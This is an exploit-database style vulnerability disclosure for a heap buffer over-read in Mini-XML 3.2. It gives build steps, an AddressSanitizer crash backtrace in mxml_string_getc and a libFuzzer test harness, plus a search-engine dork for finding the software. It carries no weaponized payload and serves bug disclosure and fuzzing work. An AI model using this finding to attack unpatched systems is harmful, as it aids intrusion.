Authored by LIWEI

Mini-XML version 3.2 suffers from a heap overflow vulnerability.

# Exploit Title: Mini-XML 3.2 - Heap Overflow
# Google Dork: mxml Mini-xml Mini-XML
# Date: 2020.10.19
# Exploit Author: LIWEI
# Vendor Homepage: https://www.msweet.org/mxml/
# Software Link: https://github.com/michaelrsweet/mxml
# Version: v3.2
# Tested on: ubuntu 18.04.2

# 1.- compile the Mini-XML code to a library use compile line"clang -g -O0 -fno-omit-frame-pointer -gline-tables-only -fsanitize=address -fsanitize-address-use-after-scope -fsanitize=fuzzer-no-link".
# 2.- compile my testcase and link them to a binary use compile line "clang -g -O0 -fno-omit-frame-pointer -gline-tables-only -fsanitize=address -fsanitize-address-use-after-scope -fsanitize=fuzzer". In my testcase, I use the API "mxmlLoadString" to parse a string.
# 3.- run the binary for a short time.crash. because the "mxml_string_getc" didn't versify the string's length and cause buffer-overflow.
# 4.- Here are the crash backtrace.

=================================================================
==6265==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x612000000a73 at pc 0x000000558e2d bp 0x7ffe13e2caa0 sp 0x7ffe13e2ca98
READ of size 1 at 0x612000000a73 thread T0
#0 in mxml_string_getc /opt/mnt/software/mxml32/mxml-file.c:2422:13
#1 in mxml_load_data /opt/mnt/software/mxml32/mxml-file.c:1558:20
#2 in mxmlLoadString /opt/mnt/software/mxml32/mxml-file.c:180:11
#3 in LLVMFuzzerTestOneInput /opt/mnt/software/mxml32/mxml_fuzzer.cpp:12:8
#4 in fuzzer::Fuzzer::ExecuteCallback(unsigned char const*, unsigned long) (/opt/mnt/software/mxml32/a.out+0x42f357)
#5 in fuzzer::RunOneTest(fuzzer::Fuzzer*, char const*, unsigned long) (/opt/mnt/software/mxml32/a.out+0x41f7ea)
#6 in fuzzer::FuzzerDriver(int*, char***, int (*)(unsigned char const*, unsigned long)) (/opt/mnt/software/mxml32/a.out+0x42a7b0)
#7 in main (/opt/mnt/software/mxml32/a.out+0x41d4b2)
#8 in __libc_start_main /build/glibc-S9d2JN/glibc-2.27/csu/../csu/libc-start.c:310
#9 in _start (/opt/mnt/software/mxml32/a.out+0x41d529)


# 6.- Here are my testcase.

#include <string>
#include <vector>
#include <assert.h>
#include "mxml.h"

extern "C" int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) {
std::string c(reinterpret_cast<const char *>(data), size);
char *ptr;

mxml_node_t *tree;

tree = mxmlLoadString(NULL, c.c_str(), MXML_NO_CALLBACK);

if(tree){

ptr = mxmlSaveAllocString(tree, MXML_NO_CALLBACK);

if(!ptr) assert(false);

mxmlDelete(tree);

}

return 0;

}